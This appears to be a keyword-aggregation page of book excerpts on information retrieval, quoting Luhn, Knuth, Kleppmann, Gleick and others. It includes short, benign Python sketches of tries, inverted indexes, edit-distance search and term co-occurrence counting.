A Business Intelligence System In a 1958 paper in the IBM Systems Journal, Hans Peter Luhn describes a system for “selective dissemination” of documents to “action points” based on the “interest profiles” of the individual action points. The author demonstrates shocking prescience. The title of the paper is “A Business Intelligence System,” and it appears to be the first use of the term “Business Intelligence” in its modern context. In addition to the dissemination of information in real time, the system was to allow for “information retrieval”—search—to be conducted over the entire document collection. Luhn’s emphasis on action points focuses the role of information processing on goal completion. In other words, it’s not enough to just collect and aggregate data; an organization must improve its capacity to complete critical tasks because of the insights gleaned from the data. He also proposes “reporters” to periodically sift the data and selectively move information to action points as needed.
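Luhn’s “selective dissemination” can be sketched as profile matching: each action point holds an interest profile of terms, and an incoming document is routed to every action point whose profile it overlaps sufficiently. The profiles, document, and threshold below are invented for illustration and are not taken from Luhn’s paper.

```python
# Interest profiles for "action points" (illustrative data).
PROFILES = {
    "sales": {"customer", "pricing", "contract"},
    "engineering": {"defect", "tolerance", "assembly"},
}

def disseminate(document, profiles, threshold=2):
    """Route a document to every action point whose interest profile
    shares at least `threshold` terms with the document's words."""
    words = set(document.lower().split())
    return sorted(
        point for point, terms in profiles.items()
        if len(words & terms) >= threshold
    )

doc = "Revised pricing terms for the Acme customer contract"
print(disseminate(doc, PROFILES))  # -> ['sales']
```

Search over the whole collection, in this picture, is just the same matching run in the other direction: a query plays the role of a one-off interest profile.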

Volunteered, or community contributed, geographic information such as the personal descriptions of place available in Geograph gives us access to new and multiple perspectives. These may reflect a range of viewpoints and enable us to begin to consider alternative notions of place as we attempt to describe it more effectively. Consequently, Ross Purves and Alistair Edwardes have been using Geograph as a source of descriptions of place in their research at the University of Zurich. Their ultimate objective involves improving information retrieval by automatically adding indexing terms to georeferenced digital photographs that relate to popular notions of place, such as “mountain,” “remote,” or “hiking.” Their work involves validating previous studies and forming new perspectives by comparing Geograph to existing efforts to describe place and analyzing term co-occurrence in the Geograph descriptions (Edwardes and Purves 2007). A popular approach in the literature involves identifying basic levels or scene types through which place is described.
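The term co-occurrence analysis mentioned above can be sketched by counting how often pairs of descriptive terms appear together in the same photo description. The captions below are invented stand-ins for Geograph descriptions; the real study involves far more data and careful term normalization.

```python
from collections import Counter
from itertools import combinations

# Invented Geograph-style photo descriptions.
captions = [
    "remote mountain path above the loch",
    "hiking trail on the mountain ridge",
    "remote moorland, popular with hiking clubs",
]

def cooccurrence(texts):
    """Count unordered word pairs that appear in the same caption."""
    pairs = Counter()
    for text in texts:
        # Sorting makes each unordered pair a single canonical tuple.
        words = sorted(set(text.lower().replace(",", "").split()))
        pairs.update(combinations(words, 2))
    return pairs

counts = cooccurrence(captions)
print(counts[("mountain", "remote")])  # co-occur in the first caption only
```

Pairs with high counts relative to their individual frequencies suggest terms that describe the same notion of place, which is the signal used to propose new indexing terms.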

Rasmussen, and A. Y. Halevy. “Google’s Deep-Web Crawl.” PVLDB 1(2): 1241–1252 (2008). Ntoulas, A., P. Zerfos, and J. Cho. “Downloading textual hidden web content through keyword queries.” JCDL 2005: 100–109. Raghavan, S. and H. Garcia-Molina. “Crawling the Hidden Web.” VLDB 2001: 129–138. Salton, G. and M. J. McGill. Introduction to Modern Information Retrieval. New York: McGraw-Hill, 1983. SpiderMonkey (JavaScript-C) Engine, http://www.mozilla.org/js/spidermonkey/. V8 JavaScript Engine, http://code.google.com/p/v8/. Chapter 10: Building Radiohead’s House of Cards. Aaron Koblin with Valdean Klump. This is the story of how the Grammy-nominated music video for Radiohead’s “House of Cards” was created entirely with data.


pages: 135 words: 26,407

How to DeFi by Coingecko, Darren Lau, Sze Jin Teh, Kristian Kho, Erina Azmi, Tm Lee, Bobby Ong

algorithmic trading, asset allocation, Bernie Madoff, bitcoin, blockchain, buy and hold, capital controls, collapse of Lehman Brothers, cryptocurrency, distributed ledger, diversification, Ethereum, ethereum blockchain, fiat currency, Firefox, information retrieval, litecoin, margin call, new economy, passive income, payday loans, peer-to-peer, prediction markets, QR code, reserve currency, smart contracts, tulip mania, two-sided market

Retrieved from https://blog.openzeppelin.com/opyn-contracts-audit/ ~ Chapter 13: Dashboard Dashboard for DeFi. (n.d.). Retrieved from https://www.defisnap.io/#/dashboard ~ Chapter 14: DeFi in Action (n.d.). Retrieved October 19, 2019, from https://slideslive.com/38920018/living-on-defi-how-i-survive-argentinas-50-inflation Gundiuc, C. (2019, September 29). Argentina Central Bank Exposed 800 Citizens' Sensitive Information. Retrieved from https://beincrypto.com/argentina-central-bank-exposed-sensitive-information-of-800-citizens/ Lopez, J. M. S. (2020, February 5). Argentina’s ‘little trees’ blossom as forex controls fuel black market. Retrieved from https://www.reuters.com/article/us-argentina-currency-blackmarket/argentinas-little-trees-blossom-as-forex-controls-fuel-black-market-idUSKBN1ZZ1H1 Russo, C. (2019, December 9).


The Art of Computer Programming: Sorting and Searching by Donald Ervin Knuth

card file, Claude Shannon: information theory, complexity theory, correlation coefficient, Donald Knuth, double entry bookkeeping, Eratosthenes, Fermat's Last Theorem, G4S, information retrieval, iterative process, John von Neumann, linked data, locality of reference, Menlo Park, Norbert Wiener, NP-complete, p-value, Paul Erdős, RAND corporation, refrigerator car, sorting algorithm, Vilfredo Pareto, Yogi Berra, Zipf's Law

. — TITUS LIVIUS, Ab Urbe Condita XXXIX.vi (Robert Burton, Anatomy of Melancholy 1.2.2.2) This book forms a natural sequel to the material on information structures in Chapter 2 of Volume 1, because it adds the concept of linearly ordered data to the other basic structural ideas. The title "Sorting and Searching" may sound as if this book is only for those systems programmers who are concerned with the preparation of general-purpose sorting routines or applications to information retrieval. But in fact the area of sorting and searching provides an ideal framework for discussing a wide variety of important general issues: • How are good algorithms discovered? • How can given algorithms and programs be improved? • How can the efficiency of algorithms be analyzed mathematically? • How can a person choose rationally between different algorithms for the same task? • In what senses can algorithms be proved "best possible"?

For example, given a large file about stage performers, a producer might wish to find all unemployed actresses between 25 and 30 with dancing talent and a French accent; given a large file of baseball statistics, a sportswriter may wish to determine the total number of runs scored by the Chicago White Sox in 1964, during the seventh inning of night games, against left-handed pitchers. Given a large file of data about anything, people like to ask arbitrarily complicated questions. Indeed, we might consider an entire library as a database, and a searcher may want to find everything that has been published about information retrieval. An introduction to the techniques for such secondary key (multi-attribute) retrieval problems appears below in Section 6.5. Before entering into a detailed study of searching, it may be helpful to put things in historical perspective. During the pre-computer era, many books of logarithm tables, trigonometry tables, etc., were compiled, so that mathematical calculations could be replaced by searching.
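One classic answer to the multi-attribute queries Knuth describes (treated in his Section 6.5 as secondary key retrieval) is to build an inverted index per attribute and answer a query by intersecting posting sets. The records and attribute names below are a toy illustration in the spirit of the stage-performers example, not Knuth’s own code.

```python
from collections import defaultdict

# Toy file of records keyed by id (invented data).
records = {
    1: {"profession": "actress", "age": 27, "accent": "French"},
    2: {"profession": "actress", "age": 41, "accent": "French"},
    3: {"profession": "actor", "age": 28, "accent": "French"},
}

# One inverted index per attribute: value -> set of record ids.
index = defaultdict(lambda: defaultdict(set))
for rid, rec in records.items():
    for attr, value in rec.items():
        index[attr][value].add(rid)

def query(**conditions):
    """Answer an exact-match multi-attribute query by intersecting
    the posting set of each attribute condition."""
    result = None
    for attr, value in conditions.items():
        postings = index[attr][value]
        result = postings if result is None else result & postings
    return sorted(result)

print(query(profession="actress", accent="French"))  # -> [1, 2]
```

Range conditions such as “between 25 and 30” need an ordered structure per attribute rather than plain hash buckets, which is part of what makes secondary-key retrieval its own subject.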

If we pursue the thumb-index idea to one of its logical conclusions, we come up with a searching scheme based on repeated "subscripting" as illustrated in Table 1. Suppose that we want to test a given search argument to see whether it is one of the 31 most common words of English (see Figs. 12 and 13 in Section 6.2.2). The data is represented in Table 1 as a trie structure; this name was suggested by E. Fredkin [CACM 3 (1960), 490–500] because it is a part of information retrieval. A trie — pronounced "try" — is essentially an M-ary tree, whose nodes are M-place vectors with components corresponding to digits or characters. Each node on level l represents the set of all keys that begin with a certain sequence of l characters called its prefix; the node specifies an M-way branch, depending on the (l + 1)st character. For example, the trie of Table 1 has 12 nodes; node (1) is the root, and we look up the first letter here.
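The branching structure described above can be sketched with nested dictionaries standing in for the M-place node vectors. The word list here is a handful of common English words for illustration, not Knuth's exact 31-word table.

```python
# A toy trie: each node branches on the next character of the key; a "$"
# entry marks that the prefix leading to this node is itself a stored key.
def trie_insert(root, word):
    node = root
    for ch in word:
        node = node.setdefault(ch, {})
    node["$"] = True  # end-of-key marker

def trie_contains(root, word):
    node = root
    for ch in word:
        if ch not in node:
            return False
        node = node[ch]
    return "$" in node

root = {}
for w in ["the", "of", "and", "to", "a", "in", "that", "is"]:
    trie_insert(root, w)

print(trie_contains(root, "that"))  # True
print(trie_contains(root, "than"))  # False
```

Lookup cost is proportional to the length of the search argument, independent of how many keys are stored — the property that makes tries attractive for this kind of word table.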


Martin Kleppmann-Designing Data-Intensive Applications. The Big Ideas Behind Reliable, Scalable and Maintainable Systems-O’Reilly (2017) by Unknown

active measures, Amazon Web Services, bitcoin, blockchain, business intelligence, business process, c2.com, cloud computing, collaborative editing, commoditize, conceptual framework, cryptocurrency, database schema, DevOps, distributed ledger, Donald Knuth, Edward Snowden, Ethereum, ethereum blockchain, fault tolerance, finite state, Flash crash, full text search, general-purpose programming language, informal economy, information retrieval, Internet of things, iterative process, John von Neumann, Kubernetes, loose coupling, Marc Andreessen, microservices, natural language processing, Network effects, packet switching, peer-to-peer, performance metric, place-making, premature optimization, recommendation engine, Richard Feynman, self-driving car, semantic web, Shoshana Zuboff, social graph, social web, software as a service, software is eating the world, sorting algorithm, source of truth, SPARQL, speech recognition, statistical model, undersea cable, web application, WebSocket, wikimedia commons

None of the databases described here can handle this kind of usage, which is why researchers have written specialized genome database software like GenBank [48]. • Particle physicists have been doing Big Data–style large-scale data analysis for decades, and projects like the Large Hadron Collider (LHC) now work with hundreds of petabytes! At such a scale custom solutions are required to stop the hardware cost from spiraling out of control [49]. • Full-text search is arguably a kind of data model that is frequently used alongside databases. Information retrieval is a large specialist subject that we won’t cover in great detail in this book, but we’ll touch on search indexes in Chapter 3 and Part III. We have to leave it there for now. In the next chapter we will discuss some of the trade-offs that come into play when implementing the data models described in this chapter. References [1] Edgar F. Codd: “A Relational Model of Data for Large Shared Data Banks,” Communications of the ACM, volume 13, number 6, pages 377–387, June 1970. doi: 10.1145/362384.362685 [2] Michael Stonebraker and Joseph M.

In LevelDB, this in-memory index is a sparse collection of some of the keys, but in Lucene, the in-memory index is a finite state automaton over the characters in the keys, similar to a trie [38]. This automaton can be transformed into a Levenshtein automaton, which supports efficient search for words within a given edit distance [39]. Other fuzzy search techniques go in the direction of document classification and machine learning. See an information retrieval textbook for more detail [e.g., 40]. Keeping everything in memory The data structures discussed so far in this chapter have all been answers to the limitations of disks. Compared to main memory, disks are awkward to deal with. With both magnetic disks and SSDs, data on disk needs to be laid out carefully if you want good performance on reads and writes. However, we tolerate this awkwardness because disks have two significant advantages: they are durable (their contents are not lost if the power is turned off), and they have a lower cost per gigabyte than RAM.
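Lucene achieves the edit-distance search above with a Levenshtein automaton; the *effect* — finding all indexed terms within a given edit distance of a query — can be illustrated more simply with a plain dynamic-programming distance computed against a small in-memory lexicon (far less efficient than the automaton, but the same result).

```python
# Brute-force fuzzy term matching: classic Levenshtein DP with a rolling row,
# applied to every term in a toy lexicon. Lucene instead intersects a
# Levenshtein automaton with its term index to avoid scanning all terms.
def edit_distance(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # deletion
                           cur[j - 1] + 1,               # insertion
                           prev[j - 1] + (ca != cb)))    # substitution
        prev = cur
    return prev[-1]

def fuzzy_search(lexicon, query, max_edits=1):
    return sorted(t for t in lexicon if edit_distance(query, t) <= max_edits)

lexicon = {"search", "searches", "sarch", "store", "stone"}
print(fuzzy_search(lexicon, "serch", max_edits=1))  # ['sarch', 'search']
```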

Williams: “Burst Tries: A Fast, Efficient Data Structure for String Keys,” ACM Transactions on Information Systems, volume 20, number 2, pages 192–223, April 2002. doi:10.1145/506309.506312 [39] Klaus U. Schulz and Stoyan Mihov: “Fast String Correction with Levenshtein Automata,” International Journal on Document Analysis and Recognition, volume 5, number 1, pages 67–85, November 2002. doi:10.1007/s10032-002-0082-8 [40] Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze: Introduction to Information Retrieval. Cambridge University Press, 2008. ISBN: 978-0-521-86571-5, available online at nlp.stanford.edu/IR-book [41] Michael Stonebraker, Samuel Madden, Daniel J. Abadi, et al.: “The End of an Architectural Era (It’s Time for a Complete Rewrite),” at 33rd International Conference on Very Large Data Bases (VLDB), September 2007. [42] “VoltDB Technical Overview White Paper,” VoltDB, 2014. [43] Stephen M.


pages: 1,237 words: 227,370

Designing Data-Intensive Applications: The Big Ideas Behind Reliable, Scalable, and Maintainable Systems by Martin Kleppmann

active measures, Amazon Web Services, bitcoin, blockchain, business intelligence, business process, c2.com, cloud computing, collaborative editing, commoditize, conceptual framework, cryptocurrency, database schema, DevOps, distributed ledger, Donald Knuth, Edward Snowden, Ethereum, ethereum blockchain, fault tolerance, finite state, Flash crash, full text search, general-purpose programming language, informal economy, information retrieval, Infrastructure as a Service, Internet of things, iterative process, John von Neumann, Kubernetes, loose coupling, Marc Andreessen, microservices, natural language processing, Network effects, packet switching, peer-to-peer, performance metric, place-making, premature optimization, recommendation engine, Richard Feynman, self-driving car, semantic web, Shoshana Zuboff, social graph, social web, software as a service, software is eating the world, sorting algorithm, source of truth, SPARQL, speech recognition, statistical model, undersea cable, web application, WebSocket, wikimedia commons

None of the databases described here can handle this kind of usage, which is why researchers have written specialized genome database software like GenBank [48]. Particle physicists have been doing Big Data–style large-scale data analysis for decades, and projects like the Large Hadron Collider (LHC) now work with hundreds of petabytes! At such a scale custom solutions are required to stop the hardware cost from spiraling out of control [49]. Full-text search is arguably a kind of data model that is frequently used alongside databases. Information retrieval is a large specialist subject that we won’t cover in great detail in this book, but we’ll touch on search indexes in Chapter 3 and Part III. We have to leave it there for now. In the next chapter we will discuss some of the trade-offs that come into play when implementing the data models described in this chapter. Footnotes i A term borrowed from electronics. Every electric circuit has a certain impedance (resistance to alternating current) on its inputs and outputs.

In LevelDB, this in-memory index is a sparse collection of some of the keys, but in Lucene, the in-memory index is a finite state automaton over the characters in the keys, similar to a trie [38]. This automaton can be transformed into a Levenshtein automaton, which supports efficient search for words within a given edit distance [39]. Other fuzzy search techniques go in the direction of document classification and machine learning. See an information retrieval textbook for more detail [e.g., 40]. Keeping everything in memory The data structures discussed so far in this chapter have all been answers to the limitations of disks. Compared to main memory, disks are awkward to deal with. With both magnetic disks and SSDs, data on disk needs to be laid out carefully if you want good performance on reads and writes. However, we tolerate this awkwardness because disks have two significant advantages: they are durable (their contents are not lost if the power is turned off), and they have a lower cost per gigabyte than RAM.

Williams: “Burst Tries: A Fast, Efficient Data Structure for String Keys,” ACM Transactions on Information Systems, volume 20, number 2, pages 192–223, April 2002. doi:10.1145/506309.506312 [39] Klaus U. Schulz and Stoyan Mihov: “Fast String Correction with Levenshtein Automata,” International Journal on Document Analysis and Recognition, volume 5, number 1, pages 67–85, November 2002. doi:10.1007/s10032-002-0082-8 [40] Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze: Introduction to Information Retrieval. Cambridge University Press, 2008. ISBN: 978-0-521-86571-5, available online at nlp.stanford.edu/IR-book [41] Michael Stonebraker, Samuel Madden, Daniel J. Abadi, et al.: “The End of an Architectural Era (It’s Time for a Complete Rewrite),” at 33rd International Conference on Very Large Data Bases (VLDB), September 2007. [42] “VoltDB Technical Overview White Paper,” VoltDB, 2014. [43] Stephen M.


pages: 855 words: 178,507

The Information: A History, a Theory, a Flood by James Gleick

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, AltaVista, bank run, bioinformatics, Brownian motion, butterfly effect, citation needed, Claude Shannon: information theory, clockwork universe, computer age, conceptual framework, crowdsourcing, death of newspapers, discovery of DNA, Donald Knuth, double helix, Douglas Hofstadter, en.wikipedia.org, Eratosthenes, Fellow of the Royal Society, Gödel, Escher, Bach, Henri Poincaré, Honoré de Balzac, index card, informal economy, information retrieval, invention of the printing press, invention of writing, Isaac Newton, Jacquard loom, Jaron Lanier, jimmy wales, Johannes Kepler, John von Neumann, Joseph-Marie Jacquard, lifelogging, Louis Daguerre, Marshall McLuhan, Menlo Park, microbiome, Milgram experiment, Network effects, New Journalism, Norbert Wiener, Norman Macrae, On the Economy of Machinery and Manufactures, PageRank, pattern recognition, phenotype, Pierre-Simon Laplace, pre–internet, Ralph Waldo Emerson, RAND corporation, reversible computing, Richard Feynman, Rubik’s Cube, Simon Singh, Socratic dialogue, Stephen Hawking, Steven Pinker, stochastic process, talking drums, the High Line, The Wisdom of Crowds, transcontinental railway, Turing machine, Turing test, women in the workforce

And then, when it was made simple, distilled, counted in bits, information was found to be everywhere. Shannon’s theory made a bridge between information and uncertainty; between information and entropy; and between information and chaos. It led to compact discs and fax machines, computers and cyberspace, Moore’s law and all the world’s Silicon Alleys. Information processing was born, along with information storage and information retrieval. People began to name a successor to the Iron Age and the Steam Age. “Man the food-gatherer reappears incongruously as information-gatherer,”♦ remarked Marshall McLuhan in 1967.♦ He wrote this an instant too soon, in the first dawn of computation and cyberspace. We can see now that information is what our world runs on: the blood and the fuel, the vital principle. It pervades the sciences from top to bottom, transforming every branch of knowledge.

(Eliot said that, too: “Where is the wisdom we have lost in knowledge? / Where is the knowledge we have lost in information?”) It is an ancient observation, but one that seemed to bear restating when information became plentiful—particularly in a world where all bits are created equal and information is divorced from meaning. The humanist and philosopher of technology Lewis Mumford, for example, restated it in 1970: “Unfortunately, ‘information retrieving,’ however swift, is no substitute for discovering by direct personal inspection knowledge whose very existence one had possibly never been aware of, and following it at one’s own pace through the further ramification of relevant literature.”♦ He begged for a return to “moral self-discipline.” There is a whiff of nostalgia in this sort of warning, along with an undeniable truth: that in the pursuit of knowledge, slower can be better.

♦ “THOSE DAYS, WHEN (AFTER PROVIDENCE”: Alexander Pope, The Dunciad (1729) (London: Methuen, 1943), 41. ♦ “KNOWLEDGE OF SPEECH, BUT NOT OF SILENCE”: T. S. Eliot, “The Rock,” in Collected Poems: 1909–1962 (New York: Harcourt Brace, 1963), 147. ♦ “THE TSUNAMI OF AVAILABLE FACT”: David Foster Wallace, Introduction to The Best American Essays 2007 (New York: Mariner, 2007). ♦ “UNFORTUNATELY, ‘INFORMATION RETRIEVING,’ HOWEVER SWIFT”: Lewis Mumford, The Myth of the Machine, vol. 2, The Pentagon of Power (New York: Harcourt, Brace, 1970), 182. ♦ “ELECTRONIC MAIL SYSTEM”: Jacob Palme, “You Have 134 Unread Mail! Do You Want to Read Them Now?” in Computer-Based Message Services, ed. Hugh T. Smith (North Holland: Elsevier, 1984), 175–76. ♦ A PAIR OF PSYCHOLOGISTS: C. J. Bartlett and Calvin G. Green, “Clinical Prediction: Does One Sometimes Know Too Much,” Journal of Counseling Psychology 13, no. 3 (1966): 267–70


pages: 153 words: 27,424

REST API Design Rulebook by Mark Masse

anti-pattern, conceptual framework, create, read, update, delete, data acquisition, database schema, hypertext link, information retrieval, web application

The HyperText Mark-up Language (HTML), to represent informative documents that contain links to related documents. The first web server.[8] The first web browser, which Berners-Lee also named “WorldWideWeb” and later renamed “Nexus” to avoid confusion with the Web itself. The first WYSIWYG[9] HTML editor, which was built right into the browser. On August 6, 1991, on the Web’s first page, Berners-Lee wrote, The WorldWideWeb (W3) is a wide-area hypermedia information retrieval initiative aiming to give universal access to a large universe of documents.[10] From that moment, the Web began to grow, at times exponentially. Within five years, the number of web users skyrocketed to 40 million. At one point, the number was doubling every two months. The “universe of documents” that Berners-Lee had described was indeed expanding. In fact, the Web was growing too large, too fast, and it was heading toward collapse.


pages: 281 words: 95,852

The Googlization of Everything: by Siva Vaidhyanathan

1960s counterculture, activist fund / activist shareholder / activist investor, AltaVista, barriers to entry, Berlin Wall, borderless world, Burning Man, Cass Sunstein, choice architecture, cloud computing, computer age, corporate social responsibility, correlation does not imply causation, creative destruction, data acquisition, death of newspapers, don't be evil, Firefox, Francis Fukuyama: the end of history, full text search, global pandemic, global village, Google Earth, Howard Rheingold, informal economy, information retrieval, John Markoff, Joseph Schumpeter, Kevin Kelly, knowledge worker, libertarian paternalism, market fundamentalism, Marshall McLuhan, means of production, Mikhail Gorbachev, moral panic, Naomi Klein, Network effects, new economy, Nicholas Carr, PageRank, Panopticon Jeremy Bentham, pirate software, Ray Kurzweil, Richard Thaler, Ronald Reagan, side project, Silicon Valley, Silicon Valley ideology, single-payer health, Skype, Social Responsibility of Business Is to Increase Its Profits, social web, Steven Levy, Stewart Brand, technoutopianism, The Nature of the Firm, The Structural Transformation of the Public Sphere, Thorstein Veblen, urban decay, web application, zero-sum game

In 2009 the core service of Google—its Web search engine—handled more than 70 percent of the Web search business in the United States and more than 90 percent in much of Europe, and grew at impressive rates elsewhere around the world. 15. Thorsten Joachims et al., “Accurately Interpreting Clickthrough Data as Implicit Feedback,” Proceedings of the 28th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (Salvador, Brazil: ACM, 2005), 154–61. 16. B. J. Jansen and U. Pooch, “A Review of Web Searching Studies and a Framework for Future Research,” Journal of the American Society for Information Science and Technology 52, no. 3 (2001): 235–46; Amanda Spink and Bernard J. Jansen, Web Search: Public Searching on the Web (Dordrecht: Kluwer Academic Publishers, 2004); Caroline M. Eastman and Bernard J.

Liwen Vaughan and Yanjun Zhang, “Equal Representation by Search Engines? A Comparison of Websites across Countries and Domains,” Journal of Computer-Mediated Communication 12, no. 3 (2007), http://jcmc.indiana.edu. 69. Wingyan Chung, “Web Searching in a Multilingual World,” Communications of the ACM 51, no. 5 (2008): 32–40; Fotis Lazarinis et al., “Current Research Issues and Trends in Non-English Web Searching,” Information Retrieval 12, no. 3 (2009): 230–50. 70. “Google’s Market Share in Your Country.” 71. Choe Sang-Hun, “Crowd’s Wisdom Helps South Korean Search Engine Beat Google and Yahoo,” New York Times, July 4, 2007. 72. “S. Korea May Clash with Google over Internet Regulation Differences,” Hankyoreh, April 17, 2009; Kim Tong-hyung, “Google Refuses to Bow to Gov’t Pressure,” Korea Times, April 9, 2009. 73. Marcus Alexander, “The Internet and Democratization: The Development of Russian Internet Policy,” Demokratizatsiya 12, no. 4 (Fall 2004): 607–27; Ronald Deibert et al., Access Denied: The Practice and Policy of Global Internet Filtering (Cambridge, MA: MIT Press, 2008). 74.


Beautiful Visualization by Julie Steele

barriers to entry, correlation does not imply causation, data acquisition, database schema, Drosophila, en.wikipedia.org, epigenetics, global pandemic, Hans Rosling, index card, information retrieval, iterative process, linked data, Mercator projection, meta analysis, meta-analysis, natural language processing, Netflix Prize, pattern recognition, peer-to-peer, performance metric, QR code, recommendation engine, semantic web, social graph, sorting algorithm, Steve Jobs, web application, wikimedia commons

[1] I should note here that in this context, “graph” means a collection of nodes and edges, not an x, y data plot. [2] See http://bit.ly/4iZib. [3] See http://en.wikipedia.org/wiki/George_Washingtons_Farewell_Address. [4] See http://avalon.law.yale.edu/18th_century/washing.asp. Chapter Nine The Big Picture: Search and Discovery Todd Holloway Search and discovery are two styles of information retrieval. Search is a familiar modality, well exemplified by Google and other web search engines. While there is a discovery aspect to search engines, there are more straightforward examples of discovery systems, such as product recommendations on Amazon and movie recommendations on Netflix. These two types of retrieval systems have in common that they can be incredibly complex under the hood.

Jessica Hagy is a writer, speaker, and consultant who boils soupy, complex ideas into tasty visual sauces for companies in need of clarity. She’s the author of acclaimed site thisisindexed.com, and her work has appeared in the New York Times, the BBC Magazine Online, Paste, Golf Digest, Redbook, New York Magazine, the National Post of Canada, the Guardian, Time, and many other old and new media outlets. Todd Holloway can’t get enough of information visualization, information retrieval, machine learning, data mining, the science of networks, and artificial intelligence. He is a Grinnell College and Indiana University alumnus. Noah Iliinsky has spent the last several years thinking about effective approaches to creating diagrams and other types of information visualization. He also works in interface and interaction design, all from a functional and user-centered perspective.


RDF Database Systems: Triples Storage and SPARQL Query Processing by Olivier Cure, Guillaume Blin

Amazon Web Services, bioinformatics, business intelligence, cloud computing, database schema, fault tolerance, full text search, information retrieval, Internet Archive, Internet of things, linked data, NP-complete, peer-to-peer, performance metric, random walk, recommendation engine, RFID, semantic web, Silicon Valley, social intelligence, software as a service, SPARQL, web application

Indeed, while compression is the main objective in URI encoding, the main feature sought in RDF stores related to literals is a full text search. The most popular solution for handling a full text search in literals is Lucene, integrated in RDF stores such as Yars2, Jena TDB/SDB, and GraphDB (formerly OWLIM), and in Big Data RDF databases, but it’s also popular for other systems, such as IBM OmniFind Yahoo! Edition, Technorati, Wikipedia, Internet Archive, and LinkedIn. Lucene is a very popular open-source information-retrieval library from the Apache Software Foundation (originally created in Java by Doug Cutting). It provides Java-based full-text indexing and searching capabilities for applications through an easy-to-use API. Lucene is based on powerful and efficient search algorithms using indexes. A Lucene index is a collection of Lucene documents. A Lucene document contains Lucene fields of text.
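The document/field model sketched above — an index is a collection of documents, and a document is a set of named text fields — can be illustrated without the Lucene API itself. This is not Lucene code, just the underlying idea: a map from each (field, term) pair to the documents containing it.

```python
# A toy field-aware inverted index in the spirit of Lucene's document model.
# Tokenization here is naive whitespace splitting; real analyzers do much more.
from collections import defaultdict

index = defaultdict(set)   # (field, term) -> doc ids
docs = {}

def add_document(doc_id, fields):
    docs[doc_id] = fields
    for field, text in fields.items():
        for term in text.lower().split():
            index[(field, term)].add(doc_id)

add_document(1, {"title": "RDF stores", "body": "full text search in literals"})
add_document(2, {"title": "Lucene intro", "body": "indexing and searching"})

print(sorted(index[("body", "search")]))   # [1]
print(sorted(index[("title", "lucene")]))  # [2]
```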

Therefore, they can be used to identify the fastest index among the six clustered indexes. The overall claim of this multiple-index approach is that, due to a clever compression strategy, the total size of the indexes is less than the size required by a standard triples table solution. The system supports both individual update operations and updates to entire batches. More details on RDF-3X and its extension X-RDF-3X are provided in Chapter 6. The YARS (Harth and Decker, 2005) system combines methods from information retrieval and databases to allow for better query answering performance over RDF data. It stores RDF data persistently by using six B+tree indexes. It not only stores the subject, the predicate, and the object, but also the context information about the data origin. Each element of the corresponding quad (i.e., 4-uplet) is encoded in a dictionary storing mappings from literals and URIs to object IDs (object IDs are stored as number identifiers for compactness). To speed up keyword queries, the lexicon keeps an inverted index on string literals to allow fast full-text searches.
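The dictionary-encoding step described above can be sketched in a few lines: every URI or literal is assigned a compact integer ID on first sight, and quads are then stored as 4-tuples of IDs. The terms below are made-up examples, not YARS data.

```python
# A minimal term dictionary of the kind YARS-style stores use: bidirectional
# mapping between terms (URIs/literals) and dense integer ids.
class Dictionary:
    def __init__(self):
        self.to_id, self.to_term = {}, []

    def encode(self, term):
        if term not in self.to_id:          # assign next id on first sight
            self.to_id[term] = len(self.to_term)
            self.to_term.append(term)
        return self.to_id[term]

    def decode(self, i):
        return self.to_term[i]

d = Dictionary()
quad = ("ex:alice", "ex:knows", "ex:bob", "ex:graph1")
encoded = tuple(d.encode(t) for t in quad)
print(encoded)                              # (0, 1, 2, 3)
print(tuple(d.decode(i) for i in encoded))  # round-trips to the original quad
```

Storing fixed-width integers instead of variable-length strings is what makes the six B+tree permutations affordable: each index holds only small ID tuples, and string comparison happens once, at encoding time.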


Getting the Builders in : How to Manage Homebuilding and Renovation Projects by Sales, Leonard John.

information retrieval

Building Your Own Home A practical guide to set up and manage a self-build programme for your perfect home The Beginner’s Guide to Property Investment The ultimate handbook for first-time buyers and would-be property investors How to be a Property Millionaire The Buy-to-Let Handbook For full details, please send for a free copy of the latest catalogue to: How To Books Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom info@howtobooks.co.uk www.howtobooks.co.uk . Published by How To Content, A division of How To Books Ltd, Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom. Tel: (01865) 375794. Fax: (01865) 379162. info@howtobooks.co.uk www.howtobooks.co.uk All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review) without the express permission of the publisher in writing. The right of Leonard Sales to be identified as the author of this work has been asserted by him in accordance with the Copyright, Designs and Patents Act 1988. © 2008 Leonard Sales First published 2004 Second edition 2006 Third edition 2008 First published in electronic form 2008 British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 285 9 Cover design by Baseline Arts Ltd, Oxford Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by TW Typesetting, Plymouth, Devon NOTE: The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in the book.


pages: 123 words: 32,382

Grouped: How Small Groups of Friends Are the Key to Influence on the Social Web by Paul Adams

Airbnb, Cass Sunstein, cognitive dissonance, David Brooks, information retrieval, invention of the telegraph, planetary scale, race to the bottom, Richard Thaler, sentiment analysis, social web, statistical model, The Wisdom of Crowds, web application, white flight

To reiterate, the first driving factor is that our online world is catching up with our offline world. Just as we are surrounded by people throughout our daily life, the web is being rebuilt around people. People are increasingly using the web to seek the information they need from each other, rather than from businesses directly. People always sourced information from each other offline, but up until now, online information retrieval tended to be from a business to a person. The second driving factor is an acknowledgment in our business models of the fact that people live in networks. For many years, we considered people as isolated, independent actors. Most of our consumer behavior models are structured this way—people acting independently, moving down a decision funnel, making objective choices along the way. Recent research in psychology and neuroscience shows that this isn’t how people make decisions.


pages: 353 words: 104,146

European Founders at Work by Pedro Gairifo Santos

business intelligence, cloud computing, crowdsourcing, fear of failure, full text search, information retrieval, inventory management, iterative process, Jeff Bezos, Joi Ito, Lean Startup, Mark Zuckerberg, natural language processing, pattern recognition, pre–internet, recommendation engine, Richard Stallman, Silicon Valley, Skype, slashdot, Steve Jobs, Steve Wozniak, subscription business, technology bubble, web application, Y Combinator

